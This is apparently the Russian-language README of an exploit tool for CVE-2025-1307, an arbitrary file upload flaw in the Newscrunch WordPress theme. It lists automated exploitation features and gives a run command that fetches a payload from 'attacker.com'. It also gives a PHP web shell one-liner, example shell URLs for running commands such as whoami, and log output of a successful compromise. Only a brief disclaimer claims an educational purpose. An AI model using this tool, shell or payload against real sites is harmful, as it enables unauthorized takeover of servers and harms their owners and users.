
Newscrunch <= 1.8.4 - Аутентифицированный (Подписчик+) Произвольная загрузка файлов
Данный эксплойт нацелен на критическую уязвимость (CVE-2025-1307) в теме Newscrunch WordPress. Ошибка позволяет аутентифицированным пользователям (начиная с подписчика) загружать произвольные файлы из-за отсутствия проверки прав доступа в функции newscrunch_install_and_activate_plugin(). Это может привести к удалённому выполнению кода (RCE), полностью скомпрометировав уязвимый сайт WordPress.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HЭксплуатируемость: Требуется действующая учётная запись WordPress с правами подписчика или выше.
✅ Автоматическая эксплуатация CVE-2025-1307
✅ Автоопределение уязвимой версии темы
✅ Автоматическая распаковка и выполнение ZIP-полезной нагрузки
✅ Динамическое получение имени файла оболочки из ZIP
✅ Автоматическая проверка доступности оболочки после эксплуатации
✅ Чистое и структурированное логирование для отладки
Убедитесь, что у вас установлен Python 3.x и установлены необходимые зависимости:
pip install requests urllib3 packaging
python CVE-2025-1307.py -u "http://target" -un "admin" -p "password" -pl "http://attacker.com/malicious.zip"
Эксплойт для CVE-2025-1307 в теме Newscrunch WordPress от Nxploit | Khaled Alenazi
опции:
-h, --help показать это справочное сообщение и выйти
-u URL, --url URL Целевой URL WordPress (например, https://example.com)
-un USERNAME, --username USERNAME
Имя пользователя WordPress
-p PASSWORD, --password PASSWORD
Пароль WordPress
-pl PAYLOAD_URL, --payload_url PAYLOAD_URL
URL вредоносного файла для загрузки
После успешной загрузки оболочки она позволяет удалённо выполнять команды на целевой системе. Файл оболочки должен находиться внутри ZIP-архива; он будет автоматически извлечён при эксплуатации.
Убедитесь, что ваша PHP-оболочка (shell.php) находится внутри ZIP-архива. Затем загрузите ZIP-файл с помощью эксплойта.
<?php system($_GET['cmd']); ?>
Вы можете выполнять системные команды через браузер, добавив параметр cmd к URL оболочки:
http://target/wp-content/plugins/shell.php?cmd=whoami
[+] Обнаружена версия темы Newscrunch: 1.8.4
[+] Эксплуатация возможна, продолжаем...
[*] Вход в систему...
[+] Вход выполнен успешно.
[*] Загрузка и распаковка полезной нагрузки...
[+] Эксплойт выполнен успешно. Вредоносный файл загружен.
[*] Проверка доступности оболочки: http://target/wp-content/plugins/U.php
[+] Оболочка успешно загружена и доступна: http://target/wp-content/plugins/U.php?cmd=ls
Этот инструмент предназначен только для образовательных целей и исследований в области безопасности. Несанкционированная эксплуатация уязвимостей является незаконной и наказуема по закону. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый данным инструментом. Используйте ответственно.
Автор: Nxploit | Khaled Alenazi